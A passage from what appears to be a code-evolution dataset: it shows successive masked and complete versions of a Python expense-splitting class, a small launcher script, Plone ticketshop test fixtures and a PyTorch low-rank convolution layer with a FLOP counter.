"step-4": "class people:\n\n def __init__(self, name):\n self.name = name\n self.purchase_descrip = []\n self.purchase_price_descrip = []\n self.purchases = []\n self.total_spent = 0\n self.debt = 0\n self.debt_temp = 0\n self.pay = []\n self.pay_out = []\n self.pay_who = []\n\n def add_purchase(self, purchase):\n self.purchases.append(purchase)\n\n def add_description(self, description):\n self.purchase_descrip.append(description)\n\n def get_purchase(self):\n return self.purchases\n <mask token>\n\n def set_total(self):\n self.total_spent = 0\n for items in self.purchases:\n self.total_spent = self.total_spent + float(items)\n\n def get_total(self):\n return self.total_spent\n\n def get_name(self):\n return self.name\n\n def add_purchase_descrip(self, price, description):\n self.purchase_price_descrip.append('$' + str(price) + ' ' +\n description)\n\n def get_purchase_descrip(self):\n return self.purchase_price_descrip\n\n def set_debt(self, cost_per_person):\n self.debt = float(self.total_spent) - cost_per_person\n\n def get_debt(self):\n return self.debt\n\n def add_payment(self, payment):\n self.pay.append(payment)\n\n def get_pay(self):\n return self.pay\n\n def add_pay_who(self, who_to_pay):\n self.pay_who.append(who_to_pay)\n\n def get_pay_who(self):\n return self.pay_who\n\n def set_debt_temp(self):\n self.debt_temp = self.debt\n\n def get_temp_debt(self):\n return self.debt_temp\n\n def update_temp_debt(self, payment):\n self.debt_temp = self.debt_temp + payment * -1\n\n def pay_temp_debt(self, payment):\n self.debt_temp - payment\n\n def round_payments(self):\n for x in range(0, len(self.pay)):\n self.pay[x] = round(self.pay[x], 2)\n\n def round_purchases(self):\n for x in range(0, len(self.purchases)):\n self.purchases[x] = round(float(self.purchases[x]), 2)\n",
"step-5": "class people:\n\n def __init__(self, name):\n self.name = name\n self.purchase_descrip = []\n self.purchase_price_descrip = []\n self.purchases = []\n self.total_spent = 0\n self.debt = 0\n self.debt_temp = 0\n self.pay = []\n self.pay_out = []\n self.pay_who = []\n\n def add_purchase(self, purchase):\n self.purchases.append(purchase)\n\n def add_description(self, description):\n self.purchase_descrip.append(description)\n\n def get_purchase(self):\n return self.purchases\n\n def get_description(self):\n return self.purchase_descrip\n\n def set_total(self):\n self.total_spent = 0\n for items in self.purchases:\n self.total_spent = self.total_spent+float(items)\n\n def get_total(self):\n return self.total_spent\n\n def get_name(self):\n return self.name\n\n def add_purchase_descrip(self, price, description):\n self.purchase_price_descrip.append(\"$\"+str(price)+\" \"+description)\n\n def get_purchase_descrip(self):\n return self.purchase_price_descrip\n\n def set_debt(self, cost_per_person):\n self.debt = float(self.total_spent)-cost_per_person\n\n def get_debt(self):\n return self.debt\n\n def add_payment(self, payment):\n self.pay.append(payment)\n\n def get_pay(self):\n return self.pay\n\n def add_pay_who(self, who_to_pay):\n self.pay_who.append(who_to_pay)\n\n def get_pay_who(self):\n return self.pay_who\n\n def set_debt_temp(self):\n self.debt_temp = self.debt\n\n def get_temp_debt(self):\n return self.debt_temp\n\n def update_temp_debt(self, payment):\n self.debt_temp = self.debt_temp+payment*-1\n\n def pay_temp_debt(self, payment):\n self.debt_temp-payment\n\n def round_payments(self):\n for x in range(0, len(self.pay)):\n self.pay[x] = round(self.pay[x], 2)\n\n def round_purchases(self):\n for x in range(0, len(self.purchases)):\n self.purchases[x] = round(float(self.purchases[x]), 2)\n\n\n\n",
"step-ids": [
13,
18,
20,
22,
24
]
}
|
[
13,
18,
20,
22,
24
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
if __name__ == '__main__':
run()
<|reserved_special_token_1|>
from ..src.script import run
if __name__ == '__main__':
run()
<|reserved_special_token_1|>
# 只放置可执行文件
#
# from ..src import package
# data_dict = package.pack()
# from ..src.plugins import * #解释一遍全放入内存
# from ..src import plugins #导入这个文件夹(包,模块,类库),默认加载init文件到内存
#
#
# plugins.pack()
from ..src.script import run
if __name__ == '__main__':
run()
|
flexible
|
{
"blob_id": "4f870e0d86d9f9b8c620115a618ea32abc24c52d",
"index": 3008,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nif __name__ == '__main__':\n run()\n",
"step-3": "from ..src.script import run\nif __name__ == '__main__':\n run()\n",
"step-4": "# 只放置可执行文件\n#\n# from ..src import package\n# data_dict = package.pack()\n\n# from ..src.plugins import * #解释一遍全放入内存\n# from ..src import plugins #导入这个文件夹(包,模块,类库),默认加载init文件到内存\n#\n#\n# plugins.pack()\n\n\nfrom ..src.script import run\n\nif __name__ == '__main__':\n run()\n\n\n\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
from Products.CMFPlone.utils import getFSVersionTuple
from bda.plone.ticketshop.interfaces import ITicketShopExtensionLayer
from plone.app.robotframework.testing import MOCK_MAILHOST_FIXTURE
from plone.app.testing import FunctionalTesting
from plone.app.testing import IntegrationTesting
from plone.app.testing import PLONE_FIXTURE
from plone.app.testing import PloneSandboxLayer
from plone.app.testing import TEST_USER_ID
from plone.app.testing import setRoles
from plone.testing import z2
from zope.interface import alsoProvides
import plone.api
if getFSVersionTuple()[0] >= 5:
PLONE5 = 1
else:
PLONE5 = 0
def set_browserlayer(request):
"""Set the BrowserLayer for the request.
We have to set the browserlayer manually, since importing the profile alone
doesn't do it in tests.
"""
alsoProvides(request, ITicketShopExtensionLayer)
class TicketshopLayer(PloneSandboxLayer):
defaultBases = (PLONE_FIXTURE,)
def setUpZope(self, app, configurationContext):
import bda.plone.ticketshop
self.loadZCML(package=bda.plone.ticketshop,
context=configurationContext)
# Install products that use an old-style initialize() function
z2.installProduct(app, 'Products.DateRecurringIndex')
def setUpPloneSite(self, portal):
self.applyProfile(portal, 'bda.plone.ticketshop:default')
def tearDownZope(self, app):
# Uninstall old-style Products
z2.uninstallProduct(app, 'Products.DateRecurringIndex')
Ticketshop_FIXTURE = TicketshopLayer()
Ticketshop_INTEGRATION_TESTING = IntegrationTesting(
bases=(Ticketshop_FIXTURE,),
name="Ticketshop:Integration")
class TicketshopATLayer(PloneSandboxLayer):
# don't use shop fixture here. looks like, test layers use differen ZODB
# connections and c.z.datagriedfield fails with a ZODB object reference
# error.
defaultBases = (PLONE_FIXTURE,)
def setUpZope(self, app, configurationContext):
import Products.ATContentTypes
self.loadZCML(package=Products.ATContentTypes,
context=configurationContext)
import bda.plone.ticketshop
self.loadZCML(package=bda.plone.ticketshop,
context=configurationContext)
# Install products that use an old-style initialize() function
z2.installProduct(app, 'Products.DateRecurringIndex')
z2.installProduct(app, 'bda.plone.ticketshop.at')
def setUpPloneSite(self, portal):
if PLONE5:
self.applyProfile(portal, 'Products.ATContentTypes:default')
self.applyProfile(portal, 'bda.plone.ticketshop.at:default')
portal.portal_workflow.setDefaultChain("one_state_workflow")
setRoles(portal, TEST_USER_ID, ['Manager'])
# Create test users
cru = plone.api.user.create
cru(email="[email protected]", username="customer1", password="customer1")
cru(email="[email protected]", username="customer2", password="customer2")
cru(email="[email protected]", username="vendor1", password="vendor1")
cru(email="[email protected]", username="vendor2", password="vendor2")
# Create test content
crc = plone.api.content.create
crc(container=portal, type='Buyable Event', id='folder_1')
crc(container=portal['folder_1'], type='Ticket', id='item_11',
title="item_11")
crc(container=portal['folder_1'], type='Ticket', id='item_12',
title="item_12")
crc(container=portal, type='Buyable Event', id='folder_2')
crc(container=portal['folder_2'], type='Ticket', id='item_21',
title="item_21")
crc(container=portal['folder_2'], type='Ticket', id='item_22',
title="item_22")
TicketshopAT_FIXTURE = TicketshopATLayer()
TicketshopAT_INTEGRATION_TESTING = IntegrationTesting(
bases=(TicketshopAT_FIXTURE,),
name="TicketshopAT:Integration")
TicketshopAT_ROBOT_TESTING = FunctionalTesting(
bases=(
MOCK_MAILHOST_FIXTURE,
TicketshopAT_FIXTURE,
z2.ZSERVER_FIXTURE
),
name="TicketshopAT:Robot")
|
normal
|
{
"blob_id": "5d7080f2778133d1938853512ca038edcf7c0dc4",
"index": 1002,
"step-1": "<mask token>\n\n\nclass TicketshopATLayer(PloneSandboxLayer):\n defaultBases = PLONE_FIXTURE,\n\n def setUpZope(self, app, configurationContext):\n import Products.ATContentTypes\n self.loadZCML(package=Products.ATContentTypes, context=\n configurationContext)\n import bda.plone.ticketshop\n self.loadZCML(package=bda.plone.ticketshop, context=\n configurationContext)\n z2.installProduct(app, 'Products.DateRecurringIndex')\n z2.installProduct(app, 'bda.plone.ticketshop.at')\n\n def setUpPloneSite(self, portal):\n if PLONE5:\n self.applyProfile(portal, 'Products.ATContentTypes:default')\n self.applyProfile(portal, 'bda.plone.ticketshop.at:default')\n portal.portal_workflow.setDefaultChain('one_state_workflow')\n setRoles(portal, TEST_USER_ID, ['Manager'])\n cru = plone.api.user.create\n cru(email='[email protected]', username='customer1', password='customer1')\n cru(email='[email protected]', username='customer2', password='customer2')\n cru(email='[email protected]', username='vendor1', password='vendor1')\n cru(email='[email protected]', username='vendor2', password='vendor2')\n crc = plone.api.content.create\n crc(container=portal, type='Buyable Event', id='folder_1')\n crc(container=portal['folder_1'], type='Ticket', id='item_11',\n title='item_11')\n crc(container=portal['folder_1'], type='Ticket', id='item_12',\n title='item_12')\n crc(container=portal, type='Buyable Event', id='folder_2')\n crc(container=portal['folder_2'], type='Ticket', id='item_21',\n title='item_21')\n crc(container=portal['folder_2'], type='Ticket', id='item_22',\n title='item_22')\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass TicketshopLayer(PloneSandboxLayer):\n <mask token>\n <mask token>\n\n def setUpPloneSite(self, portal):\n self.applyProfile(portal, 'bda.plone.ticketshop:default')\n\n def tearDownZope(self, app):\n z2.uninstallProduct(app, 'Products.DateRecurringIndex')\n\n\n<mask token>\n\n\nclass TicketshopATLayer(PloneSandboxLayer):\n defaultBases = PLONE_FIXTURE,\n\n def setUpZope(self, app, configurationContext):\n import Products.ATContentTypes\n self.loadZCML(package=Products.ATContentTypes, context=\n configurationContext)\n import bda.plone.ticketshop\n self.loadZCML(package=bda.plone.ticketshop, context=\n configurationContext)\n z2.installProduct(app, 'Products.DateRecurringIndex')\n z2.installProduct(app, 'bda.plone.ticketshop.at')\n\n def setUpPloneSite(self, portal):\n if PLONE5:\n self.applyProfile(portal, 'Products.ATContentTypes:default')\n self.applyProfile(portal, 'bda.plone.ticketshop.at:default')\n portal.portal_workflow.setDefaultChain('one_state_workflow')\n setRoles(portal, TEST_USER_ID, ['Manager'])\n cru = plone.api.user.create\n cru(email='[email protected]', username='customer1', password='customer1')\n cru(email='[email protected]', username='customer2', password='customer2')\n cru(email='[email protected]', username='vendor1', password='vendor1')\n cru(email='[email protected]', username='vendor2', password='vendor2')\n crc = plone.api.content.create\n crc(container=portal, type='Buyable Event', id='folder_1')\n crc(container=portal['folder_1'], type='Ticket', id='item_11',\n title='item_11')\n crc(container=portal['folder_1'], type='Ticket', id='item_12',\n title='item_12')\n crc(container=portal, type='Buyable Event', id='folder_2')\n crc(container=portal['folder_2'], type='Ticket', id='item_21',\n title='item_21')\n crc(container=portal['folder_2'], type='Ticket', id='item_22',\n title='item_22')\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef set_browserlayer(request):\n \"\"\"Set the BrowserLayer for the request.\n\n We have to set the browserlayer manually, since importing the profile alone\n doesn't do it in tests.\n \"\"\"\n alsoProvides(request, ITicketShopExtensionLayer)\n\n\nclass TicketshopLayer(PloneSandboxLayer):\n defaultBases = PLONE_FIXTURE,\n\n def setUpZope(self, app, configurationContext):\n import bda.plone.ticketshop\n self.loadZCML(package=bda.plone.ticketshop, context=\n configurationContext)\n z2.installProduct(app, 'Products.DateRecurringIndex')\n\n def setUpPloneSite(self, portal):\n self.applyProfile(portal, 'bda.plone.ticketshop:default')\n\n def tearDownZope(self, app):\n z2.uninstallProduct(app, 'Products.DateRecurringIndex')\n\n\n<mask token>\n\n\nclass TicketshopATLayer(PloneSandboxLayer):\n defaultBases = PLONE_FIXTURE,\n\n def setUpZope(self, app, configurationContext):\n import Products.ATContentTypes\n self.loadZCML(package=Products.ATContentTypes, context=\n configurationContext)\n import bda.plone.ticketshop\n self.loadZCML(package=bda.plone.ticketshop, context=\n configurationContext)\n z2.installProduct(app, 'Products.DateRecurringIndex')\n z2.installProduct(app, 'bda.plone.ticketshop.at')\n\n def setUpPloneSite(self, portal):\n if PLONE5:\n self.applyProfile(portal, 'Products.ATContentTypes:default')\n self.applyProfile(portal, 'bda.plone.ticketshop.at:default')\n portal.portal_workflow.setDefaultChain('one_state_workflow')\n setRoles(portal, TEST_USER_ID, ['Manager'])\n cru = plone.api.user.create\n cru(email='[email protected]', username='customer1', password='customer1')\n cru(email='[email protected]', username='customer2', password='customer2')\n cru(email='[email protected]', username='vendor1', password='vendor1')\n cru(email='[email protected]', username='vendor2', password='vendor2')\n crc = plone.api.content.create\n crc(container=portal, type='Buyable Event', id='folder_1')\n crc(container=portal['folder_1'], type='Ticket', id='item_11',\n title='item_11')\n crc(container=portal['folder_1'], type='Ticket', id='item_12',\n title='item_12')\n crc(container=portal, type='Buyable Event', id='folder_2')\n crc(container=portal['folder_2'], type='Ticket', id='item_21',\n title='item_21')\n crc(container=portal['folder_2'], type='Ticket', id='item_22',\n title='item_22')\n\n\n<mask token>\n",
"step-4": "<mask token>\nif getFSVersionTuple()[0] >= 5:\n PLONE5 = 1\nelse:\n PLONE5 = 0\n\n\ndef set_browserlayer(request):\n \"\"\"Set the BrowserLayer for the request.\n\n We have to set the browserlayer manually, since importing the profile alone\n doesn't do it in tests.\n \"\"\"\n alsoProvides(request, ITicketShopExtensionLayer)\n\n\nclass TicketshopLayer(PloneSandboxLayer):\n defaultBases = PLONE_FIXTURE,\n\n def setUpZope(self, app, configurationContext):\n import bda.plone.ticketshop\n self.loadZCML(package=bda.plone.ticketshop, context=\n configurationContext)\n z2.installProduct(app, 'Products.DateRecurringIndex')\n\n def setUpPloneSite(self, portal):\n self.applyProfile(portal, 'bda.plone.ticketshop:default')\n\n def tearDownZope(self, app):\n z2.uninstallProduct(app, 'Products.DateRecurringIndex')\n\n\n<mask token>\n\n\nclass TicketshopATLayer(PloneSandboxLayer):\n defaultBases = PLONE_FIXTURE,\n\n def setUpZope(self, app, configurationContext):\n import Products.ATContentTypes\n self.loadZCML(package=Products.ATContentTypes, context=\n configurationContext)\n import bda.plone.ticketshop\n self.loadZCML(package=bda.plone.ticketshop, context=\n configurationContext)\n z2.installProduct(app, 'Products.DateRecurringIndex')\n z2.installProduct(app, 'bda.plone.ticketshop.at')\n\n def setUpPloneSite(self, portal):\n if PLONE5:\n self.applyProfile(portal, 'Products.ATContentTypes:default')\n self.applyProfile(portal, 'bda.plone.ticketshop.at:default')\n portal.portal_workflow.setDefaultChain('one_state_workflow')\n setRoles(portal, TEST_USER_ID, ['Manager'])\n cru = plone.api.user.create\n cru(email='[email protected]', username='customer1', password='customer1')\n cru(email='[email protected]', username='customer2', password='customer2')\n cru(email='[email protected]', username='vendor1', password='vendor1')\n cru(email='[email protected]', username='vendor2', password='vendor2')\n crc = plone.api.content.create\n crc(container=portal, type='Buyable Event', id='folder_1')\n crc(container=portal['folder_1'], type='Ticket', id='item_11',\n title='item_11')\n crc(container=portal['folder_1'], type='Ticket', id='item_12',\n title='item_12')\n crc(container=portal, type='Buyable Event', id='folder_2')\n crc(container=portal['folder_2'], type='Ticket', id='item_21',\n title='item_21')\n crc(container=portal['folder_2'], type='Ticket', id='item_22',\n title='item_22')\n\n\n<mask token>\n",
"step-5": "from Products.CMFPlone.utils import getFSVersionTuple\nfrom bda.plone.ticketshop.interfaces import ITicketShopExtensionLayer\nfrom plone.app.robotframework.testing import MOCK_MAILHOST_FIXTURE\nfrom plone.app.testing import FunctionalTesting\nfrom plone.app.testing import IntegrationTesting\nfrom plone.app.testing import PLONE_FIXTURE\nfrom plone.app.testing import PloneSandboxLayer\nfrom plone.app.testing import TEST_USER_ID\nfrom plone.app.testing import setRoles\nfrom plone.testing import z2\nfrom zope.interface import alsoProvides\nimport plone.api\n\nif getFSVersionTuple()[0] >= 5:\n PLONE5 = 1\nelse:\n PLONE5 = 0\n\n\ndef set_browserlayer(request):\n \"\"\"Set the BrowserLayer for the request.\n\n We have to set the browserlayer manually, since importing the profile alone\n doesn't do it in tests.\n \"\"\"\n alsoProvides(request, ITicketShopExtensionLayer)\n\n\nclass TicketshopLayer(PloneSandboxLayer):\n defaultBases = (PLONE_FIXTURE,)\n\n def setUpZope(self, app, configurationContext):\n import bda.plone.ticketshop\n self.loadZCML(package=bda.plone.ticketshop,\n context=configurationContext)\n\n # Install products that use an old-style initialize() function\n z2.installProduct(app, 'Products.DateRecurringIndex')\n\n def setUpPloneSite(self, portal):\n self.applyProfile(portal, 'bda.plone.ticketshop:default')\n\n def tearDownZope(self, app):\n # Uninstall old-style Products\n z2.uninstallProduct(app, 'Products.DateRecurringIndex')\n\n\nTicketshop_FIXTURE = TicketshopLayer()\nTicketshop_INTEGRATION_TESTING = IntegrationTesting(\n bases=(Ticketshop_FIXTURE,),\n name=\"Ticketshop:Integration\")\n\n\nclass TicketshopATLayer(PloneSandboxLayer):\n # don't use shop fixture here. looks like, test layers use differen ZODB\n # connections and c.z.datagriedfield fails with a ZODB object reference\n # error.\n defaultBases = (PLONE_FIXTURE,)\n\n def setUpZope(self, app, configurationContext):\n import Products.ATContentTypes\n self.loadZCML(package=Products.ATContentTypes,\n context=configurationContext)\n\n import bda.plone.ticketshop\n self.loadZCML(package=bda.plone.ticketshop,\n context=configurationContext)\n\n # Install products that use an old-style initialize() function\n z2.installProduct(app, 'Products.DateRecurringIndex')\n\n z2.installProduct(app, 'bda.plone.ticketshop.at')\n\n def setUpPloneSite(self, portal):\n if PLONE5:\n self.applyProfile(portal, 'Products.ATContentTypes:default')\n self.applyProfile(portal, 'bda.plone.ticketshop.at:default')\n\n portal.portal_workflow.setDefaultChain(\"one_state_workflow\")\n setRoles(portal, TEST_USER_ID, ['Manager'])\n\n # Create test users\n cru = plone.api.user.create\n cru(email=\"[email protected]\", username=\"customer1\", password=\"customer1\")\n cru(email=\"[email protected]\", username=\"customer2\", password=\"customer2\")\n cru(email=\"[email protected]\", username=\"vendor1\", password=\"vendor1\")\n cru(email=\"[email protected]\", username=\"vendor2\", password=\"vendor2\")\n\n # Create test content\n crc = plone.api.content.create\n\n crc(container=portal, type='Buyable Event', id='folder_1')\n crc(container=portal['folder_1'], type='Ticket', id='item_11',\n title=\"item_11\")\n crc(container=portal['folder_1'], type='Ticket', id='item_12',\n title=\"item_12\")\n\n crc(container=portal, type='Buyable Event', id='folder_2')\n crc(container=portal['folder_2'], type='Ticket', id='item_21',\n title=\"item_21\")\n crc(container=portal['folder_2'], type='Ticket', id='item_22',\n title=\"item_22\")\n\n\nTicketshopAT_FIXTURE = TicketshopATLayer()\nTicketshopAT_INTEGRATION_TESTING = IntegrationTesting(\n bases=(TicketshopAT_FIXTURE,),\n name=\"TicketshopAT:Integration\")\nTicketshopAT_ROBOT_TESTING = FunctionalTesting(\n bases=(\n MOCK_MAILHOST_FIXTURE,\n TicketshopAT_FIXTURE,\n z2.ZSERVER_FIXTURE\n ),\n name=\"TicketshopAT:Robot\")\n",
"step-ids": [
4,
7,
10,
11,
14
]
}
|
[
4,
7,
10,
11,
14
] |
<|reserved_special_token_0|>
class xCNNlow(torch.nn.Module):
def __init__(self, channels, filters, kernel_size, padding=0, stride=1,
groups=1, rank=1, bias=True):
super(xCNNlow, self).__init__()
self.filters = filters
self.times = 2
self.kernel_size = kernel_size
self.channels = channels // groups
self.padding = padding
self.stride = stride
self.biasTrue = bias
self.rank = rank
self.groups = groups
self.conv_weights = nn.Parameter(torch.Tensor(filters // self.times,
channels, kernel_size, kernel_size).to(device))
self.column_weights = nn.Parameter(torch.Tensor(filters - filters //
self.times, self.rank).to(device))
self.row_weights = nn.Parameter(torch.Tensor(self.rank, filters //
self.times).to(device))
torch.nn.init.xavier_uniform(self.conv_weights)
self.column_weights.data.uniform_(-0.1, 0.1)
self.row_weights.data.uniform_(-0.1, 0.1)
if self.biasTrue:
self.bias = nn.Parameter(torch.Tensor(filters).to(device))
self.bias.data.uniform_(-0.1, 0.1)
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class xCNNlow(torch.nn.Module):
def __init__(self, channels, filters, kernel_size, padding=0, stride=1,
groups=1, rank=1, bias=True):
super(xCNNlow, self).__init__()
self.filters = filters
self.times = 2
self.kernel_size = kernel_size
self.channels = channels // groups
self.padding = padding
self.stride = stride
self.biasTrue = bias
self.rank = rank
self.groups = groups
self.conv_weights = nn.Parameter(torch.Tensor(filters // self.times,
channels, kernel_size, kernel_size).to(device))
self.column_weights = nn.Parameter(torch.Tensor(filters - filters //
self.times, self.rank).to(device))
self.row_weights = nn.Parameter(torch.Tensor(self.rank, filters //
self.times).to(device))
torch.nn.init.xavier_uniform(self.conv_weights)
self.column_weights.data.uniform_(-0.1, 0.1)
self.row_weights.data.uniform_(-0.1, 0.1)
if self.biasTrue:
self.bias = nn.Parameter(torch.Tensor(filters).to(device))
self.bias.data.uniform_(-0.1, 0.1)
def forward(self, input):
self.correlated_weights = torch.mm(self.column_weights, torch.mm(
self.row_weights, self.conv_weights.reshape(self.filters //
self.times, -1))).reshape(self.filters - self.filters // self.
times, self.channels, self.kernel_size, self.kernel_size)
if self.biasTrue:
return F.conv2d(input, torch.cat((self.conv_weights, self.
correlated_weights), dim=0), bias=self.bias, padding=self.
padding, stride=self.stride)
else:
return F.conv2d(input, torch.cat((self.conv_weights, self.
correlated_weights), dim=0), padding=self.padding, stride=
self.stride)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class xCNNlow(torch.nn.Module):
def __init__(self, channels, filters, kernel_size, padding=0, stride=1,
groups=1, rank=1, bias=True):
super(xCNNlow, self).__init__()
self.filters = filters
self.times = 2
self.kernel_size = kernel_size
self.channels = channels // groups
self.padding = padding
self.stride = stride
self.biasTrue = bias
self.rank = rank
self.groups = groups
self.conv_weights = nn.Parameter(torch.Tensor(filters // self.times,
channels, kernel_size, kernel_size).to(device))
self.column_weights = nn.Parameter(torch.Tensor(filters - filters //
self.times, self.rank).to(device))
self.row_weights = nn.Parameter(torch.Tensor(self.rank, filters //
self.times).to(device))
torch.nn.init.xavier_uniform(self.conv_weights)
self.column_weights.data.uniform_(-0.1, 0.1)
self.row_weights.data.uniform_(-0.1, 0.1)
if self.biasTrue:
self.bias = nn.Parameter(torch.Tensor(filters).to(device))
self.bias.data.uniform_(-0.1, 0.1)
def forward(self, input):
self.correlated_weights = torch.mm(self.column_weights, torch.mm(
self.row_weights, self.conv_weights.reshape(self.filters //
self.times, -1))).reshape(self.filters - self.filters // self.
times, self.channels, self.kernel_size, self.kernel_size)
if self.biasTrue:
return F.conv2d(input, torch.cat((self.conv_weights, self.
correlated_weights), dim=0), bias=self.bias, padding=self.
padding, stride=self.stride)
else:
return F.conv2d(input, torch.cat((self.conv_weights, self.
correlated_weights), dim=0), padding=self.padding, stride=
self.stride)
def count_op_xCNNlow(m, x, y):
x = x[0]
multiply_adds = 1
cin = m.channels
cout = m.filters
kh, kw = m.kernel_size, m.kernel_size
batch_size = x.size()[0]
out_h = y.size(2)
out_w = y.size(3)
kernel_ops = multiply_adds * kh * kw
bias_ops = 1 if m.biasTrue is True else 0
ops_per_element = kernel_ops + bias_ops
output_elements = batch_size * out_w * out_h * cout
conv_ops = output_elements * ops_per_element * cin // m.groups
total_mul_1 = m.filters // m.times
total_add_1 = total_mul_1 - 1
num_elements_1 = m.rank * (cin * kh * kw)
total_mul_2 = m.rank
total_add_2 = total_mul_2 - 1
num_elements_2 = (m.filters - m.filters // m.times) * (cin * kh * kw)
lin_ops = (total_mul_1 + total_add_1) * num_elements_1 + (total_mul_2 +
total_add_2) * num_elements_2
total_ops = lin_ops + conv_ops
print(lin_ops, conv_ops)
m.total_ops = torch.Tensor([int(total_ops)])
<|reserved_special_token_1|>
import torch
import torch.nn as nn
import torch.nn.functional as F
class xCNNlow(torch.nn.Module):
def __init__(self, channels, filters, kernel_size, padding=0, stride=1,
groups=1, rank=1, bias=True):
super(xCNNlow, self).__init__()
self.filters = filters
self.times = 2
self.kernel_size = kernel_size
self.channels = channels // groups
self.padding = padding
self.stride = stride
self.biasTrue = bias
self.rank = rank
self.groups = groups
self.conv_weights = nn.Parameter(torch.Tensor(filters // self.times,
channels, kernel_size, kernel_size).to(device))
self.column_weights = nn.Parameter(torch.Tensor(filters - filters //
self.times, self.rank).to(device))
self.row_weights = nn.Parameter(torch.Tensor(self.rank, filters //
self.times).to(device))
torch.nn.init.xavier_uniform(self.conv_weights)
self.column_weights.data.uniform_(-0.1, 0.1)
self.row_weights.data.uniform_(-0.1, 0.1)
if self.biasTrue:
self.bias = nn.Parameter(torch.Tensor(filters).to(device))
self.bias.data.uniform_(-0.1, 0.1)
def forward(self, input):
self.correlated_weights = torch.mm(self.column_weights, torch.mm(
self.row_weights, self.conv_weights.reshape(self.filters //
self.times, -1))).reshape(self.filters - self.filters // self.
times, self.channels, self.kernel_size, self.kernel_size)
if self.biasTrue:
return F.conv2d(input, torch.cat((self.conv_weights, self.
correlated_weights), dim=0), bias=self.bias, padding=self.
padding, stride=self.stride)
else:
return F.conv2d(input, torch.cat((self.conv_weights, self.
correlated_weights), dim=0), padding=self.padding, stride=
self.stride)
def count_op_xCNNlow(m, x, y):
x = x[0]
multiply_adds = 1
cin = m.channels
cout = m.filters
kh, kw = m.kernel_size, m.kernel_size
batch_size = x.size()[0]
out_h = y.size(2)
out_w = y.size(3)
kernel_ops = multiply_adds * kh * kw
bias_ops = 1 if m.biasTrue is True else 0
ops_per_element = kernel_ops + bias_ops
output_elements = batch_size * out_w * out_h * cout
conv_ops = output_elements * ops_per_element * cin // m.groups
total_mul_1 = m.filters // m.times
total_add_1 = total_mul_1 - 1
num_elements_1 = m.rank * (cin * kh * kw)
total_mul_2 = m.rank
total_add_2 = total_mul_2 - 1
num_elements_2 = (m.filters - m.filters // m.times) * (cin * kh * kw)
lin_ops = (total_mul_1 + total_add_1) * num_elements_1 + (total_mul_2 +
total_add_2) * num_elements_2
total_ops = lin_ops + conv_ops
print(lin_ops, conv_ops)
m.total_ops = torch.Tensor([int(total_ops)])
<|reserved_special_token_1|>
import torch
import torch.nn as nn
import torch.nn.functional as F
# Const. low-rank version
class xCNNlow(torch.nn.Module):
def __init__(self, channels, filters, kernel_size, padding=0, stride=1, groups=1, rank=1, bias=True):
super(xCNNlow, self).__init__()
self.filters = filters
self.times = 2
self.kernel_size = kernel_size
self.channels = channels//groups
self.padding = padding
self.stride = stride
self.biasTrue = bias
self.rank = rank
self.groups = groups
self.conv_weights = nn.Parameter(torch.Tensor(filters//self.times, channels, kernel_size, kernel_size).to(device))
self.column_weights = nn.Parameter(torch.Tensor(filters-filters//self.times, self.rank).to(device))
self.row_weights = nn.Parameter(torch.Tensor(self.rank, filters//self.times).to(device))
torch.nn.init.xavier_uniform(self.conv_weights)
self.column_weights.data.uniform_(-0.1, 0.1)
self.row_weights.data.uniform_(-0.1, 0.1)
if self.biasTrue:
self.bias = nn.Parameter(torch.Tensor(filters).to(device))
self.bias.data.uniform_(-0.1, 0.1)
def forward(self, input):
self.correlated_weights = torch.mm(self.column_weights, torch.mm(self.row_weights,self.conv_weights.reshape(self.filters//self.times,-1)))\
.reshape(self.filters-self.filters//self.times, self.channels, self.kernel_size, self.kernel_size)
if self.biasTrue:
return F.conv2d(input, torch.cat((self.conv_weights,self.correlated_weights), dim = 0),\
bias=self.bias, padding=self.padding, stride=self.stride)
else:
return F.conv2d(input, torch.cat((self.conv_weights,self.correlated_weights), dim = 0),\
padding=self.padding, stride=self.stride)
#count FLOPs
def count_op_xCNNlow(m, x, y):
x = x[0]
multiply_adds = 1
cin = m.channels
cout = m.filters
kh, kw = m.kernel_size, m.kernel_size
batch_size = x.size()[0]
out_h = y.size(2)
out_w = y.size(3)
# ops per output element
# kernel_mul = kh * kw * cin
# kernel_add = kh * kw * cin - 1
kernel_ops = multiply_adds * kh * kw
bias_ops = 1 if m.biasTrue is True else 0
ops_per_element = kernel_ops + bias_ops
# total ops
# num_out_elements = y.numel()
output_elements = batch_size * out_w * out_h * cout
conv_ops = output_elements * ops_per_element * cin // m.groups
# per output element
total_mul_1 = m.filters//m.times
total_add_1 = total_mul_1 - 1
num_elements_1 = m.rank * (cin * kh * kw) # (m.filters - m.filters//m.times)
total_mul_2 = m.rank
total_add_2 = total_mul_2 - 1
num_elements_2 = (m.filters - m.filters//m.times) * (cin * kh * kw) # (m.filters - m.filters//m.times)
lin_ops = (total_mul_1 + total_add_1) * num_elements_1 + (total_mul_2 + total_add_2) * num_elements_2
total_ops = lin_ops + conv_ops
print(lin_ops, conv_ops)
m.total_ops = torch.Tensor([int(total_ops)])
|
flexible
|
{
"blob_id": "f714c7006f50379cc7508a13d710d902d38d2d1f",
"index": 425,
"step-1": "<mask token>\n\n\nclass xCNNlow(torch.nn.Module):\n\n def __init__(self, channels, filters, kernel_size, padding=0, stride=1,\n groups=1, rank=1, bias=True):\n super(xCNNlow, self).__init__()\n self.filters = filters\n self.times = 2\n self.kernel_size = kernel_size\n self.channels = channels // groups\n self.padding = padding\n self.stride = stride\n self.biasTrue = bias\n self.rank = rank\n self.groups = groups\n self.conv_weights = nn.Parameter(torch.Tensor(filters // self.times,\n channels, kernel_size, kernel_size).to(device))\n self.column_weights = nn.Parameter(torch.Tensor(filters - filters //\n self.times, self.rank).to(device))\n self.row_weights = nn.Parameter(torch.Tensor(self.rank, filters //\n self.times).to(device))\n torch.nn.init.xavier_uniform(self.conv_weights)\n self.column_weights.data.uniform_(-0.1, 0.1)\n self.row_weights.data.uniform_(-0.1, 0.1)\n if self.biasTrue:\n self.bias = nn.Parameter(torch.Tensor(filters).to(device))\n self.bias.data.uniform_(-0.1, 